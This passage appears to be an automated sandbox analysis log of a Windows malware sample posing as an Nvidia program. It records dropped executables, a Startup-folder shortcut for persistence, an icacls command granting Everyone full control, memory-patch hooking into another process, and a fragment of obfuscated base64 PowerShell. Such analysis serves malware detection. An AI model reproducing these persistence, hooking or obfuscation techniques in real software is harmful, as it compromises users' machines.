Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: olepro32.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: amsi.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: userenv.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: profapi.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: sxs.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: winhttpcom.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: webio.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: python313.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: magnification.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: netapi32.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: version.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: wsock32.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: wtsapi32.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: d3d9.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: dwmapi.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: kernel.appcore.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: dwmapi.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: windows.storage.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: wldp.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: netutils.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: uxtheme.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: security.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: secur32.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: sspicli.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: olepro32.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: vcruntime140.dll
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: textshaping.dll
Source: C:\Users\user\Desktop\RcFBMph6zu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Nvidia-48001.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Nvidia-48001\Nvidia-48001.exe
Source: C:\Nvidia-48001\Nvidia-48001.exeWindow found: window name: TEditJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: RcFBMph6zu.exeStatic PE information: certificate valid
Source: RcFBMph6zu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RcFBMph6zu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Nvidia-48001.exe, 0000000B.00000002.2668651451.0000000005F31000.00000020.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Nvidia-48001.exe, 0000000B.00000002.2668651451.0000000005F31000.00000020.10000000.00040000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('QwA6AFwATgB2AGkAZABpAGEA')))${f9bb78b0edf5474dac7fd2bfa5a929c4} = Get-Random -Minimum 10000 -Maximum 99999${159d02cf6c7b473990f4b55553ac77fb} = $ExecutionContext.InvokeCommand.Expand
Source: initial sampleStatic PE information: section where entry point is pointing to: .2"V
Source: play.exe.2.drStatic PE information: section name: .!Zx
Source: play.exe.2.drStatic PE information: section name: .]#m
Source: play.exe.2.drStatic PE information: section name: .2"V
Source: C:\Users\user\Desktop\RcFBMph6zu.exeCode function: 0_2_00007FFD342000BD pushad ; iretd 0_2_00007FFD342000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD340ED2A5 pushad ; iretd 2_2_00007FFD340ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342227F2 push eax; retf 2_2_00007FFD34222809
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342000BD pushad ; iretd 2_2_00007FFD342000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342080BD push ebx; ret 2_2_00007FFD3420816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342080ED push ebx; ret 2_2_00007FFD3420816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342078CB push ebx; retf 2_2_00007FFD3420796A

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-48001\Nvidia-48001.exe (copy)Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-48001\play.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-48001.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-48001.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 770005 value: E9 8B 2F C1 76 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382F90 value: E9 7A D0 3E 89 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 780005 value: E9 5B 2E C0 76 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382E60 value: E9 AA D1 3F 89 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 7E0005 value: E9 EB 3E BA 76 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77383EF0 value: E9 1A C1 45 89 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: CC0005 value: E9 DB 2F 6C 76 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382FE0 value: E9 2A D0 93 89 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: CD0005 value: E9 BB 2D 6B 76 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382DC0 value: E9 4A D2 94 89 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: CE0005 value: E9 CB 2A 6A 76 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382AD0 value: E9 3A D5 95 89 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: CF0005 value: E9 7B 2B 69 76 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382B80 value: E9 8A D4 96 89 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 1BE0005 value: E9 1B 2F 7A 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382F20 value: E9 EA D0 85 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 1BF0005 value: E9 FB 2C 79 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382D00 value: E9 0A D3 86 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 1FF0005 value: E9 DB 2D 39 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382DE0 value: E9 2A D2 C6 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2000005 value: E9 AB 3E 38 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77383EB0 value: E9 5A C1 C7 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2010005 value: E9 2B 2F 37 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382F30 value: E9 DA D0 C8 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2020005 value: E9 9B 2F 36 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382FA0 value: E9 6A D0 C9 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2030005 value: E9 0B 2D 35 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382D10 value: E9 FA D2 CA 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2040005 value: E9 CB 3B 34 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77383BD0 value: E9 3A C4 CB 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2050005 value: E9 2B 2D 33 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382D30 value: E9 DA D2 CC 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2060005 value: E9 4B 47 32 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77384750 value: E9 BA B8 CD 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2070005 value: E9 BB 2C 31 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382CC0 value: E9 4A D3 CE 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2080005 value: E9 8B 3B 30 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77383B90 value: E9 7A C4 CF 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 2090005 value: E9 5B 2B 2F 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382B60 value: E9 AA D4 D0 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 20A0005 value: E9 6B 2B 2E 75 Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 4256 base: 77382B70 value: E9 9A D4 D1 8A Jump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 1BE0005 value: E9 8B 2F 7A 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382F90 value: E9 7A D0 85 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 1BF0005 value: E9 5B 2E 79 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382E60 value: E9 AA D1 86 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 20C0005 value: E9 EB 3E 2C 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77383EF0 value: E9 1A C1 D3 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 20E0005 value: E9 DB 2F 2A 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382FE0 value: E9 2A D0 D5 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 20F0005 value: E9 BB 2D 29 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382DC0 value: E9 4A D2 D6 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2100005 value: E9 CB 2A 28 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382AD0 value: E9 3A D5 D7 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2110005 value: E9 7B 2B 27 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382B80 value: E9 8A D4 D8 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2120005 value: E9 1B 2F 26 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382F20 value: E9 EA D0 D9 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2130005 value: E9 FB 2C 25 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382D00 value: E9 0A D3 DA 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2140005 value: E9 DB 2D 24 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382DE0 value: E9 2A D2 DB 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2150005 value: E9 AB 3E 23 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77383EB0 value: E9 5A C1 DC 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2160005 value: E9 2B 2F 22 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382F30 value: E9 DA D0 DD 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2170005 value: E9 9B 2F 21 75
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382FA0 value: E9 6A D0 DE 8A
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2570005 value: E9 0B 2D E1 74
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382D10 value: E9 FA D2 1E 8B
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2580005 value: E9 CB 3B E0 74
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77383BD0 value: E9 3A C4 1F 8B
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 2590005 value: E9 2B 2D DF 74
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382D30 value: E9 DA D2 20 8B
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 25A0005 value: E9 4B 47 DE 74
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77384750 value: E9 BA B8 21 8B
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 25B0005 value: E9 BB 2C DD 74
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382CC0 value: E9 4A D3 22 8B
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 25D0005 value: E9 8B 3B DB 74
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77383B90 value: E9 7A C4 24 8B
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 25E0005 value: E9 5B 2B DA 74
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382B60 value: E9 AA D4 25 8B
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 25F0005 value: E9 6B 2B D9 74
Source: C:\Nvidia-48001\Nvidia-48001.exeMemory written: PID: 2032 base: 77382B70 value: E9 9A D4 26 8B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-48001 /grant Everyone:F /T /C
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
